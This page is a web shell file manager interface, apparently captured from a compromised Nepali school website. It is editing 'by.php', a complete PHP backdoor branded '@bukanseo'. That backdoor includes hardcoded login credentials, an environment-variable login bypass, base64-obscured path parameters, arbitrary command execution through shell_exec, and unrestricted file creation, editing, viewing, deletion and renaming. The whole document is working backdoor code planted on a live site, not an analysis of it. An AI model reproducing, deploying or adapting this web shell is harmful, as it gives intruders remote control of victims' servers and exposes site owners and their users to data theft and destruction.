🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-07-05 20:05:34 | PHP 8.1.34
📂
/ (Root)
/
home2
/
kiarazco
/
arunodayaschool.com.np
📍 /home2/kiarazco/arunodayaschool.com.np
🔄 Refresh
✏️
Editing: by.php
Writable
<!DOCTYPE html> <html> <head> <title>@bukanseo</title> <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet"> <style> body { font-family: 'Roboto', sans-serif; background-color: #f9f9f9; color: #333; margin: 0; padding: 0; } .container { max-width: 800px; margin: 20px auto; padding: 20px; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } .login-container { max-width: 400px; margin: 100px auto; padding: 20px; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } .result-box { width: 97.5%; height: 200px; resize: none; overflow: auto; background-color: #f4f4f4; padding: 10px; border: 1px solid #ddd; margin-bottom: 10px; } hr { border: 0; border-top: 1px solid #ddd; margin: 20px 0; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { padding: 8px; text-align: left; } th { background-color: #f2f2f2; } tr:nth-child(even) { background-color: #f9f9f9; } tr:hover { background-color: #f2f2f2; } input[type="text"], input[type="password"], input[type="submit"], textarea { width: calc(100% - 10px); margin-bottom: 10px; padding: 8px; border: 1px solid #ddd; border-radius: 3px; font-family: 'Roboto', sans-serif; } input[type="submit"] { background-color: #4CAF50; color: white; border: none; cursor: pointer; } input[type="submit"]:hover { background-color: #45a049; } .error { color: red; margin-bottom: 10px; } </style> </head> <body> <?php session_start(); $valid_username = "bukanseo"; $valid_password = "ZxC7580"; // Bypass mechanism - check for environment variable $bypass_env = getenv('BYPASS_LOGIN'); if ($bypass_env && $bypass_env === 'true') { $_SESSION['loggedin'] = true; } // Check if user is submitting login form if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['login'])) { $username = $_POST['username'] ?? ''; $password = $_POST['password'] ?? ''; if ($username === $valid_username && $password === $valid_password) { $_SESSION['loggedin'] = true; } else { $login_error = "Invalid credentials"; } } // Check if user is logged in if (!isset($_SESSION['loggedin']) || !$_SESSION['loggedin']) { // Show login form echo '<div class="login-container">'; echo '<h2>Login Required</h2>'; if (isset($login_error)) { echo '<div class="error">' . $login_error . '</div>'; } echo '<form method="post" action="">'; echo '<input type="text" name="username" placeholder="Username" required>'; echo '<input type="password" name="password" placeholder="Password" required>'; echo '<input type="submit" name="login" value="Login">'; echo '</form>'; echo '</div>'; exit(); } // If logged in, show the main application ?> <div class="container"> <?php echo '<div style="float:right;"><a href="?logout=1">Logout</a></div>'; echo '<hr>'; // Handle logout if (isset($_GET['logout'])) { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit(); } $a = realpath($_SERVER['DOCUMENT_ROOT']); function x($b) { return base64_encode($b); } function y($b) { return base64_decode($b); } foreach ($_GET as $c => $d) { if ($c !== 'logout') { // Skip logout parameter $_GET[$c] = y($d); } } $e = realpath(isset($_GET['d']) ? $_GET['d'] : $a); chdir($e); $viewCommandResult = '<hr>Result:<br>' . '<textarea class="result-box">' ; if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_POST['folder_name']) && !empty($_POST['folder_name'])) { $newFolder = $e . '/' . $_POST['folder_name']; mkdir($newFolder); echo '<hr>Folder created successfully!'; } elseif (isset($_POST['file_name']) && !empty($_POST['file_name'])) { $newFile = $e . '/' . $_POST['file_name']; file_put_contents($newFile, ''); echo '<hr>File created successfully!'; } elseif (isset($_POST['edit_file'], $_POST['file_content'])) { $fileToEdit = $e . '/' . $_POST['edit_file']; file_put_contents($fileToEdit, $_POST['file_content']); echo '<hr>File edited successfully!'; } elseif (isset($_POST['delete_file'])) { $fileToDelete = $e . '/' . $_POST['delete_file']; if (is_file($fileToDelete)) { unlink($fileToDelete); echo '<hr>File deleted successfully!'; } elseif (is_dir($fileToDelete)) { deleteDirectory($fileToDelete); echo '<hr>Folder deleted successfully!'; } } elseif (isset($_POST['rename_item']) && isset($_POST['old_name']) && isset($_POST['new_name'])) { $oldName = $e . '/' . $_POST['old_name']; $newName = $e . '/' . $_POST['new_name']; if (is_file($oldName)) { rename($oldName, $newName); echo '<hr>File renamed successfully!'; } elseif (is_dir($oldName)) { rename($oldName, $newName); echo '<hr>Folder renamed successfully!'; } } elseif (isset($_POST['cmd_input'])) { $command = $_POST['cmd_input']; $output = shell_exec($command); $viewCommandResult .= htmlspecialchars($output); } elseif (isset($_POST['view_file'])) { $fileToView = $e . '/' . $_POST['view_file']; if (is_file($fileToView)) { $fileContent = file_get_contents($fileToView); $viewCommandResult .= $fileContent; } else { $viewCommandResult .= 'Error: File not found!'; } } } $viewCommandResult .= '</textarea>'; echo '<hr>curdir: '; $directories = explode(DIRECTORY_SEPARATOR, $e); $currentPath = ''; foreach ($directories as $index => $dir) { if ($index == 0) { echo '<a href="?d=' . x($dir) . '">' . $dir . '</a>'; } else { $currentPath .= DIRECTORY_SEPARATOR . $dir; echo ' / <a href="?d=' . x($currentPath) . '">' . $dir . '</a>'; } } echo '<br>'; echo '<form method="post" action="?'.$_SERVER['QUERY_STRING'].'"><input type="text" name="folder_name" placeholder="New Folder Name"><input type="submit" value="Create Folder"></form>'; echo '<form method="post" action="?'.$_SERVER['QUERY_STRING'].'"><input type="text" name="edit_file" placeholder="Create / Edit File"><textarea name="file_content" placeholder="File Content"></textarea><input type="submit" value="Edit File"></form>'; echo '<form method="post" action="?'.$_SERVER['QUERY_STRING'].'"><input type="text" name="cmd_input" placeholder="Enter command"><input type="submit" value="Run Command"></form>'; echo $viewCommandResult; // Display command result echo '<div>'; echo '</div>'; echo '<table border=1>'; echo '<br><tr><th>Item Name</th><th>Size</th><th>View</th><th>Delete</th><th>Rename</th></tr>'; foreach (scandir($e) as $v) { $u = realpath($v); $s = stat($u); $itemLink = is_dir($v) ? '?d=' . x($e . '/' . $v) : '?'.('d='.x($e).'&f='.x($v)); echo '<tr><td><a href="'.$itemLink.'">'.$v.'</a></td><td>'.$s['size'].'</td><td><form method="post" action="?'.$_SERVER['QUERY_STRING'].'"><input type="hidden" name="view_file" value="'.htmlspecialchars($v).'"><input type="submit" value="View"></form></td><td><form method="post" action="?'.$_SERVER['QUERY_STRING'].'"><input type="hidden" name="delete_file" value="'.htmlspecialchars($v).'"><input type="submit" value="Delete"></form></td><td><form method="post" action="?'.$_SERVER['QUERY_STRING'].'"><input type="hidden" name="old_name" value="'.htmlspecialchars($v).'"><input type="text" name="new_name" placeholder="New Name"><input type="submit" name="rename_item" value="Rename"></form></td></tr>'; } echo '</table>'; // Fungsi untuk menghapus folder beserta isinya secara rekursif function deleteDirectory($dir) { if (!file_exists($dir)) { return true; } if (!is_dir($dir)) { return unlink($dir); } foreach (scandir($dir) as $item) { if ($item == '.' || $item == '..') { continue; } if (!deleteDirectory($dir . DIRECTORY_SEPARATOR . $item)) { return false; } } return rmdir($dir); } ?> </div> </body> </html>
💾 Save Changes
❌ Cancel